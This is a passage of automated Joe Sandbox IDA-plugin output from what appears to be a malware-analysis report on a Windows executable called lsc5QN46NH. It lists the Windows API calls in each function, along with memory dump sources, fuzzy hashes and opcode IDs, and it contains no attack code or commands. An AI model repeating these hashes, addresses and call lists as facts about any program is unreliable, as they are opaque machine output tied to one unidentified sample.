                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3382505437-0
                                                                                                                • Opcode ID: a3c52167c76fa6b2c177f501c71ec3ac28ca3dfd7272f32db4e6e0094a4e1a73
                                                                                                                • Instruction ID: e124889cbf02e559d69af260118692c44e03a4de84145404d88d99f4d2a875fd
                                                                                                                • Opcode Fuzzy Hash: a3c52167c76fa6b2c177f501c71ec3ac28ca3dfd7272f32db4e6e0094a4e1a73
                                                                                                                • Instruction Fuzzy Hash: 8531AD71500219EFDB14CFA8D94DADE3BB6EB04316F10822AFD25E72D1DBB09958DB90
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 0065B204
                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0065B221
                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0065B259
                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0065B27F
                                                                                                                • _wcsstr.LIBCMT ref: 0065B289
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902887630-0
                                                                                                                • Opcode ID: 812db204bd4f47b0201dfd5252c943ff5ffad0cce83d92174ee9c6ae19bf5c42
                                                                                                                • Instruction ID: e732c29c7521c06b2b2844b50573933f9d1f99955466b330349236257ea431d4
                                                                                                                • Opcode Fuzzy Hash: 812db204bd4f47b0201dfd5252c943ff5ffad0cce83d92174ee9c6ae19bf5c42
                                                                                                                • Instruction Fuzzy Hash: 322125312042107AEB255B35AC09EBF7B9ADF49711F10522DFC04CA261EF618D819760
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0068B192
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0068B1B7
                                                                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0068B1CF
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 0068B1F8
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00670E90,00000000), ref: 0068B216
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$MetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2294984445-0
                                                                                                                • Opcode ID: 282f446efda4a24cae16cb48a37d312998a5b5e75fc9a508f49b99cc29e51dac
                                                                                                                • Instruction ID: 659df73b2e7a216883f840a24b909cd5ab8ec2028453d449f5a0cb6ff299abcd
                                                                                                                • Opcode Fuzzy Hash: 282f446efda4a24cae16cb48a37d312998a5b5e75fc9a508f49b99cc29e51dac
                                                                                                                • Instruction Fuzzy Hash: 4F219171910261AFCB10AF38DC28ABA3BA6FB15321F145738F972D72E0E73099518B90
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00659320
                                                                                                                  • Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00659352
                                                                                                                • __itow.LIBCMT ref: 0065936A
                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00659392
                                                                                                                • __itow.LIBCMT ref: 006593A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$__itow$_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2983881199-0
                                                                                                                • Opcode ID: 57a56312c2daf7086a66267250289cad67979a7b322ee189aceeedc2b1cd39cf
                                                                                                                • Instruction ID: 5ec48e607e0ace47413368f3b7c0c51a792544fd56f6a0c9a743703aef1b5207
                                                                                                                • Opcode Fuzzy Hash: 57a56312c2daf7086a66267250289cad67979a7b322ee189aceeedc2b1cd39cf
                                                                                                                • Instruction Fuzzy Hash: 1A21F531B40218FBDB10AB608C8AEEE7BABEB49711F044029FD04D72C0D6B09D4987A1
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 00675A6E
                                                                                                                • GetForegroundWindow.USER32 ref: 00675A85
                                                                                                                • GetDC.USER32(00000000), ref: 00675AC1
                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00675ACD
                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00675B08
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 4156661090-0
                                                                                                                • Opcode ID: 3d1562b2a13e3a7b9ac0abdd79b820e26dfabb5668e7ef619a83a5e34852de47
                                                                                                                • Instruction ID: 70fabb408ce8102f6078404789cdb2d6c5ed07c96124c2c73ef446187020d2b3
                                                                                                                • Opcode Fuzzy Hash: 3d1562b2a13e3a7b9ac0abdd79b820e26dfabb5668e7ef619a83a5e34852de47
                                                                                                                • Instruction Fuzzy Hash: C8219235A00104AFDB14EF64D884A9ABBE6EF48310F14C579F84A97352DA70AC40CB50
                                                                                                                APIs
                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0060134D
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0060135C
                                                                                                                • BeginPath.GDI32(?), ref: 00601373
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0060139C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225163088-0
                                                                                                                • Opcode ID: 5d98fb03ea2221e48937f7f049a286d784bd1d71ed6f70e63a16c295ee6a3278
                                                                                                                • Instruction ID: c49e8c5d65780427ce47e95bc547869ec4159e1b488db828dc20de727a19b501
                                                                                                                • Opcode Fuzzy Hash: 5d98fb03ea2221e48937f7f049a286d784bd1d71ed6f70e63a16c295ee6a3278
                                                                                                                • Instruction Fuzzy Hash: 6C216D30941718EFDB189F25DC08BAA7BABFB01361F545226F812DA2F0D771A991DF90
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00664ABA
                                                                                                                • __beginthreadex.LIBCMT ref: 00664AD8
                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00664AED
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00664B03
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00664B0A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                • String ID:
                                                                                                                • API String ID: 3824534824-0
                                                                                                                • Opcode ID: d9dfdf171a575a021297cb8355657d11ebba6aa9a911676322ac13234abef7e3
                                                                                                                • Instruction ID: 226ddb48e35a00bdc51e11560ad21a40c6943e9f584731230c31f16d81012532
                                                                                                                • Opcode Fuzzy Hash: d9dfdf171a575a021297cb8355657d11ebba6aa9a911676322ac13234abef7e3
                                                                                                                • Instruction Fuzzy Hash: 8F110476908618BBC7009FA8EC08EEB7FAEEB45320F144369F815D3350DA75DA448BA0
                                                                                                                APIs
                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0065821E
                                                                                                                • GetLastError.KERNEL32(?,00657CE2,?,?,?), ref: 00658228
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00657CE2,?,?,?), ref: 00658237
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00657CE2,?,?,?), ref: 0065823E
                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00658255
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 842720411-0
                                                                                                                • Opcode ID: d68d19f4bfa9aa50112cf4eedd479597333f312d7555a899c770b96235150f2f
                                                                                                                • Instruction ID: 6ab99cd7dc165716b9c9cfda69030780656affc2529568d9f5f2cad38211e16c
                                                                                                                • Opcode Fuzzy Hash: d68d19f4bfa9aa50112cf4eedd479597333f312d7555a899c770b96235150f2f
                                                                                                                • Instruction Fuzzy Hash: F8014B71200204BFDB204FA6DC48DAB7FAEEF8A755B500629F849D3220DA318D14CBA0
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?,?,00657455), ref: 00657127
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?), ref: 00657142
                                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?), ref: 00657150
                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?), ref: 00657160
                                                                                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657044,80070057,?,?), ref: 0065716C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3897988419-0
                                                                                                                • Opcode ID: dc19399dc50ef8463b6d4114548d5b4019e6a727a47f9c48d1bc36fc09931df5
                                                                                                                • Instruction ID: b661aee8b9f3718130fb51207e935b04dd4eab4140b631fb306c367e6bc81662
                                                                                                                • Opcode Fuzzy Hash: dc19399dc50ef8463b6d4114548d5b4019e6a727a47f9c48d1bc36fc09931df5
                                                                                                                • Instruction Fuzzy Hash: C6018FB2601614BBDB214F65EC44BAA7BBEEF44792F180164FD04D2220DB31DD459BA0
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00665260
                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0066526E
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00665276
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00665280
                                                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006652BC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                • String ID:
                                                                                                                • API String ID: 2833360925-0
                                                                                                                • Opcode ID: aaf723812b7929e93b4c66547c67fff4a0d14ba493859db2b2fc41150ba837e0
                                                                                                                • Instruction ID: 129b60f28b5d18b7acba2d79dc24ad51bb256c57868d70ee84d831687361f8c1
                                                                                                                • Opcode Fuzzy Hash: aaf723812b7929e93b4c66547c67fff4a0d14ba493859db2b2fc41150ba837e0
                                                                                                                • Instruction Fuzzy Hash: 35011B31D01A19EBCF00EFE4DC5A5EDBB7AFB09711F401555E942F2244CB30965087A5
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00658121
                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0065812B
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0065813A
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00658141
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658157
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                • Opcode ID: ff798b430a4cfcb2915dd0585f88df1946046adf60412ba05e43e49a30420d35
                                                                                                                • Instruction ID: 6e8a0d387840b29c29ee56e589e78997709f00e8bcb3c237739908e3c2575fa4
                                                                                                                • Opcode Fuzzy Hash: ff798b430a4cfcb2915dd0585f88df1946046adf60412ba05e43e49a30420d35
                                                                                                                • Instruction Fuzzy Hash: 45F0AF70200305BFEB210FA5EC88EA73BAEEF49755F100125F985D3650DA619845DB60
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0065C1F7
                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0065C20E
                                                                                                                • MessageBeep.USER32(00000000), ref: 0065C226
                                                                                                                • KillTimer.USER32(?,0000040A), ref: 0065C242
                                                                                                                • EndDialog.USER32(?,00000001), ref: 0065C25C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3741023627-0
                                                                                                                • Opcode ID: 4957bf8888d55498436b6a76c49d53574cd9b7c0fdc190f1792ee3a090545977
                                                                                                                • Instruction ID: ac3f4c60593ae4591929f69553ec459bdb20e190b63c3b7318dba2356ae9f244
                                                                                                                • Opcode Fuzzy Hash: 4957bf8888d55498436b6a76c49d53574cd9b7c0fdc190f1792ee3a090545977
                                                                                                                • Instruction Fuzzy Hash: 3B01A230404704ABEB205B60ED4EB9677BABB00B06F000769B982A14E0DBE46A888B90
                                                                                                                APIs
                                                                                                                • EndPath.GDI32(?), ref: 006013BF
                                                                                                                • StrokeAndFillPath.GDI32(?,?,0063B888,00000000,?), ref: 006013DB
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 006013EE
                                                                                                                • DeleteObject.GDI32 ref: 00601401
                                                                                                                • StrokePath.GDI32(?), ref: 0060141C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2625713937-0
                                                                                                                • Opcode ID: a2221ba26681ec85e17d666a0c39d3e2dc7dea75b6ae8c9dd24bd5ce3a87bc0c
                                                                                                                • Instruction ID: 62a48b0267f3f18ff5d671004c410521a3dc245d88275c7d349f5b7ac79088c8
                                                                                                                • Opcode Fuzzy Hash: a2221ba26681ec85e17d666a0c39d3e2dc7dea75b6ae8c9dd24bd5ce3a87bc0c
                                                                                                                • Instruction Fuzzy Hash: 87F01930011B08EFDB195F26EC4CBA93BE7A701326F18A324E42A881F1CB3059A5DF10
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0066C432
                                                                                                                • CoCreateInstance.OLE32(00692D6C,00000000,00000001,00692BDC,?), ref: 0066C44A
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                • CoUninitialize.OLE32 ref: 0066C6B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 2683427295-24824748
                                                                                                                • Opcode ID: b44efa59a404d7daa5a99f4c8dab99b191ab85dbed401f2eb721a0c89fd1067d
                                                                                                                • Instruction ID: 36bd06fd15ed57b17d3a1938e8f3abf9ed0605cedfec16c986917e2818e86fd1
                                                                                                                • Opcode Fuzzy Hash: b44efa59a404d7daa5a99f4c8dab99b191ab85dbed401f2eb721a0c89fd1067d
                                                                                                                • Instruction Fuzzy Hash: D6A14AB1144205AFD744EF54C881EABB7EEEF84314F00491DF196872A2EB71EA09CB66
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00620DB6: std::exception::exception.LIBCMT ref: 00620DEC
                                                                                                                  • Part of subcall function 00620DB6: __CxxThrowException@8.LIBCMT ref: 00620E01
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                  • Part of subcall function 00607A51: _memmove.LIBCMT ref: 00607AAB
                                                                                                                • __swprintf.LIBCMT ref: 00612ECD
                                                                                                                Strings
                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00612D66
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                • API String ID: 1943609520-557222456
                                                                                                                • Opcode ID: 1167eb37918027946bda1eed00feadcaf87dbd973ded82055a25948cb535e465
                                                                                                                • Instruction ID: 42e0698d619df552c6580d8e454b24924f72587c55636e023e89f0b2abe9a7b0
                                                                                                                • Opcode Fuzzy Hash: 1167eb37918027946bda1eed00feadcaf87dbd973ded82055a25948cb535e465
                                                                                                                • Instruction Fuzzy Hash: 8291B0715083069FC758EF24D895CAFB7AAEF85710F04481DF4829B2A2DB30ED95CB56
                                                                                                                APIs
